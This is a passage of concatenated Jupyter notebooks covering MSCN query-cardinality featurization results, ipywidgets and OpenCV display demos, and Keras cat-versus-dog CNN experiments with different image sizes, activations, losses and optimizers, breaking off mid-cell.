1, 0, 0, 0, 1, 0, 0, 0.5,}} 0, 0, 0, 0, 1, 0, 0, 1, 0.3, 0, 0, 0, 0, 0, 0, 0, 0, 0]$$ should map to an identical cardinality, and indeed be identical queries (we have merely switched the order of predicate operations), but they have very different predicate featurized representations. It would appear that the MSCN is not flexible enough to recognize this difference. Even when aggregating over sets of predicates (as the MSCN can be adjusted to do), the improved predicate featurization still outperforms the previous implementation.
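To make this concrete, the short self-contained sketch below (toy attribute set and hypothetical helper names, not the repository code) builds both featurizations for the example predicate set and checks that only the new one is order-invariant:
###Code
import numpy as np

cols = ['a', 'b', 'c', 'd', 'e']
ops = ['<', '>', '=']
col2vec = {c: np.eye(len(cols))[i] for i, c in enumerate(cols)}
op2vec = {o: np.eye(len(ops))[i] for i, o in enumerate(ops)}
preds = [('b', '<', 0.5), ('d', '>', 0.2), ('e', '=', 0.3)]

def featurize_original(preds, max_preds=4):
    # one (column one-hot | operator one-hot | value) slot per predicate, zero-padded to max_preds
    vecs = [np.hstack([col2vec[c], op2vec[o], v]) for c, o, v in preds]
    pad = [np.zeros(len(cols) + len(ops) + 1)] * (max_preds - len(preds))
    return np.hstack(vecs + pad)

def featurize_new(preds):
    # one fixed slot per (column, operator) pair, holding the normalized value
    vec = np.zeros(len(cols) * len(ops))
    for c, o, v in preds:
        vec[cols.index(c) * len(ops) + ops.index(o)] = v
    return vec

shuffled = [preds[1], preds[0], preds[2]]
print(len(featurize_original(preds)), len(featurize_new(preds)))                # 36 vs 15
print(np.array_equal(featurize_new(preds), featurize_new(shuffled)))            # order-invariant
print(np.array_equal(featurize_original(preds), featurize_original(shuffled)))  # order-dependent
###Output
_____no_output_____
###Markdown
The cell below retrains the MSCN with the updated featurization plugged into the pipeline.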
###Code
print('Retrained MSCN Architecture with Updated Featurization:\n')
start_time = time.time()
#Note: We use this altered function on the back end with other utis, and integrate accordingly.
train_and_predict_NEW(testset='job-light', num_queries=5000, epochs=1000, batch_size=100, hid=256)
print(f'Total Time: {round((time.time()-start_time),4)} seconds')
###Output
Retrained MSCN Architecture with Updated Featurization:
Q-Error job-light:
Median: 3.3707934686744982
90th percentile: 44.26868661918655
95th percentile: 197.39683996127513
99th percentile: 782.6566606666486
Max: 954.0733123971569
Mean: 41.41337581462835
Total Time: 210.5493 seconds
|
tfsimple.ipynb | ###Markdown
Simple Tensorflow image classification
###Code
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
import time
import data_helpers
beginTime = time.time()
# Parameter definitions
batch_size = 100
learning_rate = 0.005
max_steps = 1000
# Uncommenting this line removes randomness
# You'll get exactly the same result on each run
# np.random.seed(1)
# Prepare data
data_sets = data_helpers.load_data()
###Output
_____no_output_____ |
examples/.ipynb_checkpoints/imaging_and_gui-checkpoint.ipynb | ###Markdown
Snap
###Code
# imports assumed by the cells below (the original import cell is missing from this checkpoint)
import numpy as np
import cv2
import matplotlib.pyplot as plt
import ipywidgets as widgets
from IPython import display
# test image stack
arr = []
for i in range(50):
    b = np.random.rand(500,500)
    b = (b*(2**16-1)).astype('uint16')
    arr.append(b)
# snap (MPL)
button = widgets.Button(description='Snap')
display.display(button)
def on_button_clicked(b):
img=arr.pop()
plt.imshow(img, cmap='gray')
display.clear_output(wait=True)
display.display(plt.gcf())
button.on_click(on_button_clicked)
# snap (CV2)
button = widgets.Button(description='Snap')
display.display(button)
def on_button_clicked(b):
img=arr.pop()
cv2.imshow('Video',img)
cv2.waitKey(30)
button.on_click(on_button_clicked)
###Output
_____no_output_____
###Markdown
Videohttp://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_gui/py_video_display/py_video_display.html
###Code
# test image stack
a = []
for i in range(50):
b = np.zeros((500,500))
b[i:i+100, i:i+100]=1.0
b=b*255
b=b.astype('uint8')
a.append(b)
# video (MPL) (slow, doesn't work well)
# for img in a:
# plt.imshow(img, cmap='gray')
# display.clear_output(wait=True)
# display.display(plt.gcf())
# video (CV2)
cv2.namedWindow('Video',cv2.WINDOW_NORMAL)
for img in a:
b = cv2.imshow('Video',img)
cv2.resizeWindow('Video', 500,500)
cv2.moveWindow('Video',0,0)
display.clear_output(wait=True)
    print(np.random.randn(1))
if cv2.waitKey(30) >= 0:
break
cv2.destroyAllWindows()
# video with button (CV2)
button = widgets.Button(description='Live')
display.display(button)
def on_button_clicked(b):
for img in a:
cv2.imshow('Video',img)
cv2.waitKey(30)
display.clear_output(wait=True)
        print(np.random.randn(1))
button.on_click(on_button_clicked)
###Output
_____no_output_____
###Markdown
GUI and BUTTONShttp://docs.opencv.org/2.4/modules/highgui/doc/user_interface.html
###Code
button = widgets.ToggleButton(description='Live', value=False)
def on_click(change):
display.clear_output(wait=True)
    print(change['new'])
button.observe(on_click, names='value')
display.display(button)
import time
b1 = widgets.Button(description='b1')
b2 = widgets.Button(description='b2')
def ctrlloop():
def b1_click(b):
for i in range(10):
            print('b1', i)
time.sleep(0.5)
def b2_click(b):
for i in range(10):
            print('b2', i)
# dl = widgets.jsdlink((button, 'value'), (vid, 'value'))
b1.on_click(b1_click)
b2.on_click(b2_click)
widgets.HBox([b1,b2])
play = widgets.Play(
interval=160,
value=50,
min=0,
max=100,
step=1,
description="Press play",
disabled=False
)
slider = widgets.IntSlider()
widgets.jslink((play, 'value'), (slider, 'value'))
widgets.HBox([play, slider])
f = open('temp.msg','w')  # text mode, since a string is written below
f.write(str(1))
f.close()
###Output
_____no_output_____
###Markdown
Arrows
###Code
# icons are from "font-awesome"
x_minus = widgets.Button(
description='',
disabled=False,
button_style='',
icon = 'arrow-left')
x_plus = widgets.Button(
description='',
disabled=False,
button_style='',
icon = 'arrow-right')
y_minus = widgets.Button(
description='',
disabled=False,
button_style='',
icon='arrow-up')
y_plus = widgets.Button(
description='',
disabled=False,
button_style='',
icon = 'arrow-down')
xy_slider = widgets.VBox([widgets.FloatText(description='speed', width='30%',value=50),widgets.IntSlider(width=100, step=10)])
xy_cluster = widgets.VBox([ widgets.HBox([x_minus,x_plus]), widgets.HBox([y_minus, y_plus]) ])
z_minus = widgets.Button(
description='',
disabled=False,
button_style='',
icon = 'arrow-up')
z_plus = widgets.Button(
description='',
disabled=False,
button_style='',
icon = 'arrow-down')
z_slider = widgets.VBox([widgets.FloatText(description='speed', width='30%',value=50),widgets.IntSlider(width=100, step=10)])
z_cluster = widgets.VBox([ z_minus, z_plus])
widgets.HBox([xy_cluster, xy_slider, z_cluster, z_slider])
###Output
Widget Javascript not detected. It may not be installed properly. Did you enable the widgetsnbextension? If not, then run "jupyter nbextension enable --py --sys-prefix widgetsnbextension"
|
ProjectCatDog(2).ipynb | ###Markdown
We use Keras to build our model; first, let us import the packages.
###Code
import os, cv2, random
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib import ticker
import seaborn as sns
%matplotlib inline
from keras.models import Sequential
from keras.layers import Input, Dropout, Flatten, Convolution2D, MaxPooling2D, Dense, Activation
from keras.optimizers import RMSprop
from keras.callbacks import ModelCheckpoint, Callback, EarlyStopping
from keras.utils import np_utils
###Output
C:\Users\HH\Anaconda3\lib\site-packages\h5py\__init__.py:36: FutureWarning: Conversion of the second argument of issubdtype from `float` to `np.floating` is deprecated. In future, it will be treated as `np.float64 == np.dtype(float).type`.
from ._conv import register_converters as _register_converters
Using TensorFlow backend.
###Markdown
Preparing the Data These functions resize the images to 64x64. We use the 25000 labelled images as the training sample and the images in the test directory as the test sample (250 of them are processed here). I also separated cats and dogs for exploratory analysis.
###Code
TRAIN_DIR = './train/train/'
TEST_DIR = './test/test/'
ROWS = 64
COLS = 64
CHANNELS = 3
train_images = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR)] # use this for full dataset
train_dogs = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'dog' in i]
train_cats = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'cat' in i]
test_images = [TEST_DIR+i for i in os.listdir(TEST_DIR)]
def read_image(file_path):
img = cv2.imread(file_path, cv2.IMREAD_COLOR) #cv2.IMREAD_GRAYSCALE
return cv2.resize(img, (ROWS, COLS), interpolation=cv2.INTER_CUBIC)
def prep_data(images):
count = len(images)
data = np.ndarray((count, CHANNELS, ROWS, COLS), dtype=np.uint8)
for i, image_file in enumerate(images):
image = read_image(image_file)
data[i] = image.T
if i%2500 == 0: print('Processed {} of {}'.format(i, count))
return data
train = prep_data(train_images)
test = prep_data(test_images)
print("Train shape: {}".format(train.shape))
print("Test shape: {}".format(test.shape))
###Output
Processed 0 of 25000
Processed 2500 of 25000
Processed 5000 of 25000
Processed 7500 of 25000
Processed 10000 of 25000
Processed 12500 of 25000
Processed 15000 of 25000
Processed 17500 of 25000
Processed 20000 of 25000
Processed 22500 of 25000
Processed 0 of 250
Train shape: (25000, 3, 64, 64)
Test shape: (250, 3, 64, 64)
###Markdown
Generating the Labels We're dealing with a binary classification problem here - (1) dog (0) cat. The labels can be created by looping over the file names in the train directory. It's nice to see the training data is perfectly balanced.
###Code
labels = []
for i in train_images:
if 'dog' in i:
labels.append(1)
else:
labels.append(0)
train = train.reshape(-1,3,64,64)
test = test.reshape(-1,3,64,64)
X_train = train.astype('float64')
X_test = test.astype('float64')
X_train /= 255
X_test /= 255
Y_train = labels
X_valid = X_train[:5000, :, :, :]
Y_valid = Y_train[:5000]
X_train = X_train[5001:25000, :, :, :]
Y_train = Y_train[5001:25000]
print("Training matrix shape", X_train.shape)
print("Testing matrix shape", X_test.shape)
sns.countplot(labels)
plt.title('Cats and Dogs')
###Output
Training matrix shape (19999, 3, 64, 64)
Testing matrix shape (250, 3, 64, 64)
###Markdown
Checking out Cats and Dogs A quick side-by-side comparison of the animals.
###Code
def show_cats_and_dogs(idx):
cat = read_image(train_cats[idx])
dog = read_image(train_dogs[idx])
pair = np.concatenate((cat, dog), axis=1)
plt.figure(figsize=(10,5))
plt.imshow(pair)
plt.show()
for idx in range(0,5):
show_cats_and_dogs(idx)
###Output
_____no_output_____
###Markdown
Build the model A scaled-down version of VGG-16, with a few notable changes: the number of convolution filters is cut in half and the fully connected (dense) layers are scaled down. We set RMSprop as the optimizer, binary_crossentropy as the loss function, and sigmoid as the output activation function.
###Code
optimizer = RMSprop(lr=1e-4)
objective = 'binary_crossentropy'
def catdog():
model = Sequential()
model.add(Convolution2D(32, 3, 3, border_mode='same', input_shape=(3, ROWS, COLS), activation='relu'))
model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Flatten())
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy'])
return model
model = catdog()
model.summary()
###Output
C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:9: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(32, (3, 3), input_shape=(3, 64, 64..., activation="relu", padding="same")`
if __name__ == '__main__':
C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:10: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(32, (3, 3), activation="relu", padding="same")`
# Remove the CWD from sys.path while we load stuff.
C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:13: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(64, (3, 3), activation="relu", padding="same")`
del sys.path[0]
C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:14: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(64, (3, 3), activation="relu", padding="same")`
C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:17: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(128, (3, 3), activation="relu", padding="same")`
C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:18: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(128, (3, 3), activation="relu", padding="same")`
C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:21: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(256, (3, 3), activation="relu", padding="same")`
C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:22: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(256, (3, 3), activation="relu", padding="same")`
###Markdown
Train Set the number of epochs to 4 and the batch size to 128
###Code
model.fit(
X_train,
Y_train,
batch_size = 128,
nb_epoch = 4,
verbose = 1,
validation_data = (X_valid, Y_valid)
)
###Output
C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`.
warnings.warn('The `nb_epoch` argument in `fit` '
###Markdown
The final accuracy is 0.87. This result is not very good, so we try to change some parameters to see the difference. Change the image resolution Resize the images to 32x32 and change the number of channels to 1
###Code
TRAIN_DIR = './train/train/'
TEST_DIR = './test/test/'
ROWS = 32
COLS = 32
CHANNELS = 1
train_images = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR)] # use this for full dataset
train_dogs = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'dog' in i]
train_cats = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'cat' in i]
test_images = [TEST_DIR+i for i in os.listdir(TEST_DIR)]
def read_image(file_path):
img = cv2.imread(file_path, cv2.IMREAD_GRAYSCALE) #cv2.IMREAD_GRAYSCALE
return cv2.resize(img, (ROWS, COLS), interpolation=cv2.INTER_CUBIC)
def prep_data(images):
count = len(images)
data = np.ndarray((count, CHANNELS, ROWS, COLS), dtype=np.uint8)
for i, image_file in enumerate(images):
image = read_image(image_file)
data[i] = image.T
if i%2500 == 0: print('Processed {} of {}'.format(i, count))
return data
train = prep_data(train_images)
test = prep_data(test_images)
print("Train shape: {}".format(train.shape))
print("Test shape: {}".format(test.shape))
labels = []
for i in train_images:
if 'dog' in i:
labels.append(1)
else:
labels.append(0)
train = train.reshape(-1, 32,32,1)
test = test.reshape(-1, 32,32,1)
X_train = train.astype('float32')
X_test = test.astype('float32')
X_train /= 255
X_test /= 255
Y_train=labels
X_valid = X_train[:5000,:,:,:]
Y_valid = Y_train[:5000]
X_train = X_train[5001:25000,:,:,:]
Y_train = Y_train[5001:25000]
print("Training matrix shape", X_train.shape)
print("Testing matrix shape", X_test.shape)
optimizer = RMSprop(lr=1e-4)
objective = 'binary_crossentropy'
def catdog():
model = Sequential()
model.add(Convolution2D(16, 3, 3, border_mode='same', input_shape=(ROWS, COLS, CHANNELS), activation='relu'))
model.add(Convolution2D(16, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 1)))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 1)))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy'])
return model
model = catdog()
model.fit(
X_train,
Y_train,
batch_size = 128,
nb_epoch = 4,
verbose = 1,
validation_data = (X_valid, Y_valid)
)
###Output
C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`.
warnings.warn('The `nb_epoch` argument in `fit` '
###Markdown
The train accuracy and test accuracy are both lower. Resize the images to 256x256 and change the number of channels to 3
###Code
import os, cv2, random
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib import ticker
import seaborn as sns
%matplotlib inline
from keras import backend as K
from keras.models import Sequential
from keras.layers import Input, Dropout, Flatten, Conv2D, MaxPooling2D, Dense, Activation
from keras.optimizers import RMSprop
from keras.callbacks import ModelCheckpoint, Callback, EarlyStopping
from keras.utils import np_utils
import os, cv2, random
import numpy as np
import pandas as pd
TRAIN_DIR = './train/train/'
TEST_DIR = './test/test/'
ROWS = 256
COLS = 256
ROWS2 = 64
COLS2 = 64
CHANNELS = 3
train_images = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR)] # use this for full dataset
train_dogs = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'dog' in i]
train_cats = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'cat' in i]
test_images = [TEST_DIR+i for i in os.listdir(TEST_DIR)]
# slice datasets for memory efficiency on Kaggle Kernels, delete if using full dataset
train_images = train_dogs[:10000] + train_cats[:10000]
random.shuffle(train_images)
test_images = test_images[:250]
def read_image(file_path):
img = cv2.imread(file_path, cv2.IMREAD_COLOR) #cv2.IMREAD_GRAYSCALE
b,g,r = cv2.split(img)
img2 = cv2.merge([r,g,b])
return cv2.resize(img2, (ROWS2, COLS2), interpolation=cv2.INTER_CUBIC)
def read_image2(file_path):
img = cv2.imread(file_path, cv2.IMREAD_COLOR) #cv2.IMREAD_GRAYSCALE
b,g,r = cv2.split(img)
img2 = cv2.merge([r,g,b])
return cv2.resize(img2, (ROWS, COLS), interpolation=cv2.INTER_CUBIC)
def prep_data(images):
count = len(images)
data = np.ndarray((count, CHANNELS, ROWS2, COLS2), dtype=np.uint8)
for i, image_file in enumerate(images):
image = read_image(image_file)
data[i] = image.T
if i%2500 == 0: print('Processed {} of {}'.format(i, count))
return data
def prep_data2(images):
count = len(images)
data = np.ndarray((count, CHANNELS, ROWS, COLS), dtype=np.uint8)
for i, image_file in enumerate(images):
image = read_image2(image_file)
data[i] = image.T
if i%100 == 0: print('Processed {} of {}'.format(i, count))
return data
train = prep_data(train_images)
test = prep_data(test_images)
test2 = prep_data2(test_images)
print("Train shape: {}".format(train.shape))
print("Test shape: {}".format(test.shape))
labels = []
for i in train_images:
if 'dog' in i:
labels.append(1)
else:
labels.append(0)
sns.countplot(labels)
from keras.models import Sequential
from keras.layers import Input, Dropout, Flatten, Conv2D, MaxPooling2D, Dense, Activation
from keras.optimizers import RMSprop
from keras.callbacks import ModelCheckpoint, Callback, EarlyStopping
from keras.utils import np_utils
optimizer = RMSprop(lr=1e-4)
objective = 'binary_crossentropy'
def catdog():
model = Sequential()
model.add(Conv2D(32, 3, padding='same', input_shape=train.shape[1:], activation='relu'))
model.add(Conv2D(32, 3, padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2), data_format="channels_first"))
#print("First layer...")
model.add(Conv2D(64, 3, padding='same', activation='relu'))
model.add(Conv2D(64, 3, padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2), data_format="channels_first"))
#print("Second layer...")
model.add(Conv2D(128, 3, padding='same', activation='relu'))
model.add(Conv2D(128, 3, padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2), data_format="channels_first"))
#print("Third layer...")
model.add(Conv2D(256, (3, 3), padding='same', activation='relu'))
model.add(Conv2D(256, (3, 3), padding='same', activation='relu'))
model.add(Conv2D(256, (3, 3), padding='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2), data_format="channels_first"))
#model.add(Conv2D(256, (3, 3), padding='same', activation='relu'))
#model.add(Conv2D(256, (3, 3), padding='same', activation='relu'))
#model.add(Conv2D(256, (3, 3), padding='same', activation='relu'))
#model.add(MaxPooling2D(pool_size=(2, 2)))
#print("Flattening, etc...")
model.add(Flatten())
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
print("Compiling model...")
model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy'])
return model
print("Creating model:")
model = catdog()
from keras.models import Sequential
from keras.layers import Input, Dropout, Flatten, Conv2D, MaxPooling2D, Dense, Activation
from keras.optimizers import RMSprop
from keras.callbacks import ModelCheckpoint, Callback, EarlyStopping
from keras.utils import np_utils
epochs =4
batch_size = 128
## Callback for loss logging per epoch
class LossHistory(Callback):
def on_train_begin(self, logs={}):
self.losses = []
self.val_losses = []
def on_epoch_end(self, batch, logs={}):
self.losses.append(logs.get('loss'))
self.val_losses.append(logs.get('val_loss'))
early_stopping = EarlyStopping(monitor='val_loss', patience=3, verbose=1, mode='auto')
def run_catdog():
history = LossHistory()
print("running model...")
model.fit(train, labels, batch_size=batch_size, epochs=epochs,
validation_split=0.25, verbose=2, shuffle=True, callbacks=[history, early_stopping])
print("making predictions on test set...")
predictions = model.predict(test, verbose=0)
return predictions, history
predictions, history = run_catdog()
loss = history.losses
val_loss = history.val_losses
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.title('VGG-16 Loss Trend')
plt.plot(loss, 'blue', label='Training Loss')
plt.plot(val_loss, 'green', label='Validation Loss')
plt.xticks(range(0,epochs)[0::2])
plt.legend()
plt.show()
###Output
running model...
Train on 15000 samples, validate on 5000 samples
Epoch 1/4
- 155s - loss: 2.2850 - acc: 0.5029 - val_loss: 7.9552 - val_acc: 0.4658
Epoch 2/4
- 159s - loss: 7.8637 - acc: 0.5083 - val_loss: 7.9785 - val_acc: 0.5050
Epoch 3/4
- 162s - loss: 8.1218 - acc: 0.4949 - val_loss: 7.9785 - val_acc: 0.5050
Epoch 4/4
- 160s - loss: 8.0103 - acc: 0.5021 - val_loss: 7.9785 - val_acc: 0.5050
Epoch 00004: early stopping
making predictions on test set...
###Markdown
The train accuracy and test accuracy both become much lower, so the best size should be 64x64. Change Activation Function Change the activation function from 'relu' to 'sigmoid'. A wide variety of sigmoid functions have been used as the activation function of artificial neurons, including the logistic and hyperbolic tangent functions. Sigmoid curves are also common in statistics as cumulative distribution functions (which go from 0 to 1), such as the integrals of the logistic distribution, the normal distribution, and Student's t probability density functions. So we want to try the sigmoid function to see whether it increases the accuracy.
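As a small standalone reference (not part of the model code), the printout below compares the two activations around zero; relu passes positive inputs through unchanged while sigmoid squashes everything into (0, 1):
###Code
import numpy as np

x = np.linspace(-4, 4, 9)
relu = np.maximum(0, x)
sigmoid = 1 / (1 + np.exp(-x))
for xi, r, s in zip(x, relu, sigmoid):
    print('x={:+.1f}  relu={:.2f}  sigmoid={:.2f}'.format(xi, r, s))
###Output
_____no_output_____
###Markdown
The cell below trains the same architecture with sigmoid activations in the dense layers.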
###Code
optimizer = RMSprop(lr=1e-4)
objective = 'binary_crossentropy'
def catdog():
model = Sequential()
model.add(Convolution2D(32, 3, 3, border_mode='same', input_shape=(3, ROWS, COLS), activation='relu'))
model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Flatten())
model.add(Dense(256, activation='sigmoid'))
model.add(Dropout(0.5))
model.add(Dense(256, activation='sigmoid'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy'])
return model
model = catdog()
model.fit(
X_train,
Y_train,
batch_size = 128,
nb_epoch = 4,
verbose = 1,
validation_data = (X_valid, Y_valid)
)
###Output
C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`.
warnings.warn('The `nb_epoch` argument in `fit` '
###Markdown
The accuracy is very low, so we keep relu as the activation function. Change the loss function Change the loss function from 'binary_crossentropy' to 'mean_squared_error'. Mean squared error measures the average of the squares of the errors or deviations, that is, the difference between the estimator and what is estimated. MSE is a risk function, corresponding to the expected value of the squared error loss or quadratic loss. The difference occurs because of randomness or because the estimator doesn't account for information that could produce a more accurate estimate.
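As a quick standalone illustration (toy numbers, not part of the training pipeline), the two losses penalise a confidently wrong prediction very differently, which is one reason log loss is the usual choice for classification:
###Code
import numpy as np

y_true = np.array([1.0, 0.0, 1.0, 1.0])
y_pred = np.array([0.9, 0.2, 0.6, 0.05])  # the last prediction is confidently wrong

mse = np.mean((y_true - y_pred) ** 2)
eps = 1e-7  # avoid log(0)
bce = -np.mean(y_true * np.log(y_pred + eps) + (1 - y_true) * np.log(1 - y_pred + eps))
print('MSE:', round(mse, 4), ' binary cross-entropy:', round(bce, 4))
###Output
_____no_output_____
###Markdown
The cell below trains the same network with mean_squared_error as the loss.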
###Code
optimizer = RMSprop(lr=1e-4)
def catdog():
model = Sequential()
model.add(Convolution2D(32, 3, 3, border_mode='same', input_shape=(3, ROWS, COLS), activation='relu'))
model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Flatten())
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.compile(loss='mean_squared_error', optimizer=optimizer)
return model
model = catdog()
model.fit(
X_train,
Y_train,
batch_size = 128,
nb_epoch = 4,
verbose = 1,
validation_data = (X_valid, Y_valid)
)
###Output
C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`.
warnings.warn('The `nb_epoch` argument in `fit` '
###Markdown
mean_squared_error is also not suitable. binary_crossentropy is Logarithmic Loss (or simply Log Loss), a classification loss function often used as an evaluation metric in Kaggle competitions. Since success in these competitions hinges on effectively minimising the Log Loss, it makes sense to have some understanding of how this metric is calculated and how it should be interpreted. Our project is a classification task, so binary_crossentropy should be the best choice. Change the optimizer Change the optimizer from 'RMSprop' to 'adam'. RMSprop is an unpublished, adaptive learning rate method proposed by Geoff Hinton in Lecture 6e of his Coursera class. RMSprop and Adadelta were both developed independently around the same time, stemming from the need to resolve Adagrad's radically diminishing learning rates. Adaptive Moment Estimation (Adam) is another method that computes adaptive learning rates for each parameter. In addition to storing an exponentially decaying average of past squared gradients $v_t$ like Adadelta and RMSprop, Adam also keeps an exponentially decaying average of past gradients $m_t$, similar to momentum. Whereas momentum can be seen as a ball running down a slope, Adam behaves like a heavy ball with friction, which thus prefers flat minima in the error surface.
###Code
optimizer = 'adam'
objective = 'binary_crossentropy'
def catdog():
model = Sequential()
model.add(Convolution2D(32, 3, 3, border_mode='same', input_shape=(3, ROWS, COLS), activation='relu'))
model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
# model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu'))
model.add(MaxPooling2D(pool_size=(1, 2)))
